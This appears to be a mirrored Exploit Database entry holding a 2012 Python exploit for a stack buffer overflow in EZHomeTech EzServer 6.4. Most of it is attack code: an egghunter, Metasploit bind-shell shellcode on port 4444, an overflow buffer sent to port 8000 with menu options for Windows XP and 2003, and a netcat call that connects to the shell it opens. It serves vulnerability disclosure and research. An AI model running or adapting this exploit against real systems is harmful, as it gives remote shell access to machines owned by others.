EZHomeTech Ezserver 6.4 – Remote Stack Overflow

• Exploit Database
• 11 阅读

• 作者： modpr0be
  日期： 2012-06-18
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/19266/

• # Exploit Title: Ezhometech EzServer <=6.4 Stack Overflow Vulnerability
  # Author: modpr0be
  # Contact: research[at]Spentera[dot]com
  # Platform: Windows
  # Tested on: Windows XP SP3 (OptIn), Windows 2003 SP2 (OptIn)
  # Software Link: http://www.ezhometech.com/buy_ezserver.htm
  # References: http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-stack-overflow-vulnerability/
   
  ### Software Description
  # EZserver is a Video Server that stream Full HD to various devices.
  
  ### Vulnerability Details
  # Buffer overflow condition exist in URL handling, sending long GET request 
  # will cause server process to exit and may allow malicious code injection. 
  # Further research found that the application does not care about the HTTP method, 
  # so that by sending long characters will make the program crash.
   
  ### Vendor logs:
  # 06/11/2012 - Bug found
  # 06/12/2012 - Vendor contacted
  # 06/16/2012 - No response from vendor, POC release.
  
  #!/usr/bin/python
  
  import sys
  import struct
  from socket import *
  from os import system
  from time import sleep
  
  hunt = (
  "\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
  "\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  "\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
  "\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
  
  #windows/shell_bind_tcp - 751 bytes
  #http://www.metasploit.com
  #Encoder: x86/alpha_upper
  #AutoRunScript=, VERBOSE=false, EXITFUNC=process, LPORT=4444, 
  
  shellcode = ("\x89\xe5\xda\xcf\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43"
  "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
  "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
  "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
  "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4c\x49\x45\x50"
  "\x35\x50\x53\x30\x35\x30\x4b\x39\x4a\x45\x36\x51\x38\x52\x33"
  "\x54\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x46\x32\x44\x4c\x4c\x4b"
  "\x30\x52\x45\x44\x4c\x4b\x33\x42\x37\x58\x44\x4f\x38\x37\x51"
  "\x5a\x57\x56\x50\x31\x4b\x4f\x36\x51\x4f\x30\x4e\x4c\x47\x4c"
  "\x53\x51\x43\x4c\x34\x42\x46\x4c\x37\x50\x49\x51\x38\x4f\x54"
  "\x4d\x53\x31\x38\x47\x4a\x42\x4a\x50\x36\x32\x56\x37\x4c\x4b"
  "\x56\x32\x44\x50\x4c\x4b\x37\x32\x37\x4c\x43\x31\x38\x50\x4c"
  "\x4b\x37\x30\x33\x48\x4b\x35\x59\x50\x54\x34\x31\x5a\x33\x31"
  "\x4e\x30\x36\x30\x4c\x4b\x30\x48\x52\x38\x4c\x4b\x56\x38\x57"
  "\x50\x53\x31\x4e\x33\x4a\x43\x57\x4c\x30\x49\x4c\x4b\x50\x34"
  "\x4c\x4b\x53\x31\x39\x46\x50\x31\x4b\x4f\x36\x51\x59\x50\x4e"
  "\x4c\x59\x51\x48\x4f\x34\x4d\x45\x51\x59\x57\x50\x38\x4b\x50"
  "\x53\x45\x5a\x54\x33\x33\x53\x4d\x4b\x48\x47\x4b\x33\x4d\x31"
  "\x34\x42\x55\x4a\x42\x46\x38\x4c\x4b\x36\x38\x31\x34\x45\x51"
  "\x38\x53\x55\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x35"
  "\x4c\x43\x31\x59\x43\x4c\x4b\x34\x44\x4c\x4b\x35\x51\x48\x50"
  "\x4c\x49\x31\x54\x31\x34\x57\x54\x51\x4b\x31\x4b\x55\x31\x56"
  "\x39\x30\x5a\x50\x51\x4b\x4f\x4d\x30\x31\x48\x31\x4f\x30\x5a"
  "\x4c\x4b\x54\x52\x5a\x4b\x4d\x56\x51\x4d\x33\x58\x37\x43\x47"
  "\x42\x45\x50\x53\x30\x43\x58\x34\x37\x53\x43\x46\x52\x31\x4f"
  "\x50\x54\x52\x48\x30\x4c\x54\x37\x46\x46\x53\x37\x4b\x4f\x39"
  "\x45\x58\x38\x4c\x50\x55\x51\x43\x30\x45\x50\x37\x59\x58\x44"
  "\x46\x34\x56\x30\x53\x58\x31\x39\x4d\x50\x32\x4b\x45\x50\x4b"
  "\x4f\x58\x55\x36\x30\x56\x30\x56\x30\x46\x30\x47\x30\x46\x30"
  "\x31\x50\x46\x30\x55\x38\x4a\x4a\x44\x4f\x39\x4f\x4b\x50\x4b"
  "\x4f\x48\x55\x4d\x59\x59\x57\x50\x31\x59\x4b\x30\x53\x55\x38"
  "\x55\x52\x35\x50\x52\x31\x51\x4c\x4b\x39\x4a\x46\x32\x4a\x32"
  "\x30\x31\x46\x50\x57\x35\x38\x49\x52\x59\x4b\x56\x57\x53\x57"
  "\x4b\x4f\x39\x45\x30\x53\x51\x47\x52\x48\x4e\x57\x4d\x39\x37"
  "\x48\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x50\x53\x30\x57\x35\x38"
  "\x44\x34\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x56\x37\x4c"
  "\x49\x58\x47\x43\x58\x34\x35\x42\x4e\x50\x4d\x53\x51\x4b\x4f"
  "\x58\x55\x55\x38\x43\x53\x52\x4d\x33\x54\x55\x50\x4c\x49\x4b"
  "\x53\x51\x47\x46\x37\x31\x47\x36\x51\x4c\x36\x33\x5a\x42\x32"
  "\x31\x49\x46\x36\x5a\x42\x4b\x4d\x45\x36\x48\x47\x47\x34\x31"
  "\x34\x37\x4c\x55\x51\x33\x31\x4c\x4d\x30\x44\x47\x54\x44\x50"
  "\x48\x46\x35\x50\x30\x44\x30\x54\x30\x50\x46\x36\x51\x46\x56"
  "\x36\x37\x36\x46\x36\x30\x4e\x31\x46\x51\x46\x51\x43\x31\x46"
  "\x32\x48\x52\x59\x48\x4c\x57\x4f\x4b\x36\x4b\x4f\x38\x55\x4d"
  "\x59\x4d\x30\x50\x4e\x56\x36\x51\x56\x4b\x4f\x36\x50\x43\x58"
  "\x54\x48\x4c\x47\x55\x4d\x33\x50\x4b\x4f\x4e\x35\x4f\x4b\x4a"
  "\x50\x58\x35\x4f\x52\x36\x36\x53\x58\x49\x36\x4d\x45\x4f\x4d"
  "\x4d\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x53\x4c\x35\x5a\x4d"
  "\x50\x4b\x4b\x4d\x30\x54\x35\x55\x55\x4f\x4b\x57\x37\x35\x43"
  "\x32\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41"
  "\x41")
  
  junk1 = "\x41" * 5025
  junk2 = "\x42" * 5029
  junk3 = "\x43" * 10000
  buff = "w00tw00t"
  buff+= shellcode
  buff+= "\x90" * 100
  buff+= "\xeb\x08\x90\x90"
  buff+= struct.pack('<L', 0x10212779)
  buff+= "\x90" * 16
  buff+= hunt
  buff+= "\x44" * 5000
  
  def winxp():
  	try:
  		host = raw_input("[!] Target IP: ")
  		print "[!] Connecting to %s on port 8000" %host
  		s = socket(AF_INET, SOCK_STREAM)
  		s.connect((host,8000))
  		print "[+] Launching attack.."
  		print "[+] Sending payload.."
  		payload = junk1+buff
  		s.send (payload)
  		s.close()
  		print "[+] Wait for hunter.."
  		sleep(5)
  		print "[+] Connecting to target shell!"
  		sleep(2)
  		system("nc -v %s 4444" %host)
  	except:
  		print "[x] Could not connect to the server x_x"
  		sys.exit()
  		
  def win2k3():
  	try:
  		host = raw_input("[!] Target IP: ")
  		print "[!] Connecting to %s on port 8000" %host
  		s = socket(AF_INET, SOCK_STREAM)
  		s.connect((host,8000))
  		print "[+] Launching attack.."
  		print "[+] Sending payload.."
  		payload = junk2+buff
  		s.send(payload)
  		s.close()
  		print "[+] Wait for hunter.."
  		sleep(5)
  		print "[+] Connecting to target shell!"
  		sleep(1)
  		system("nc -v %s 4444" %host)
  	except:
  		print "[x] Could not connect to the server x_x"
  		sys.exit()
  		
  def crash():
  	try:
  		host = raw_input("[!] Target IP: ")
  		print "[!] Connecting to %s on port 8000" %host
  		s = socket(AF_INET, SOCK_STREAM)
  		s.connect((host,8000))
  		print "[+] Launching attack.."
  		print "[+] Sending payload.."
  		payload = junk3
  		s.send (payload)
  		s.close()
  		print "[+] Server should be crashed! Check your debugger"
  	except:
  		print "[x] Could not connect to the server x_x"
  		sys.exit()
  
  print "#################################################################"
  print "# EZHomeTech EZServer <= 6.4.0.17 Stack Overflow Exploit	#"
  print "#by modpr0be[at]spentera | @modpr0be		#"
  print "# thanks to: otoy, cikumel, y0k | @spentera		#"
  print "================================================================="
  print "\t1.Windows XP SP3 (DEP OptIn) bindshell on port 4444"
  print "\t2.Windows 2003 SP2 (DEP OptIn) bindshell on port 4444"
  print "\t3.Crash only (debug)\n"
  
  a = 0
  while a < 3:
  	a = a + 1
  	op = input ("[!] Choose your target OS: ")
  	if op == 1:
  		winxp()
  		sys.exit()
  	elif op == 2:
  		win2k3()
  		sys.exit()
  	elif op == 3:
  		crash()
  		sys.exit()
  	else:
  		print "[-] Oh plz.. pick the right one :)\r\n"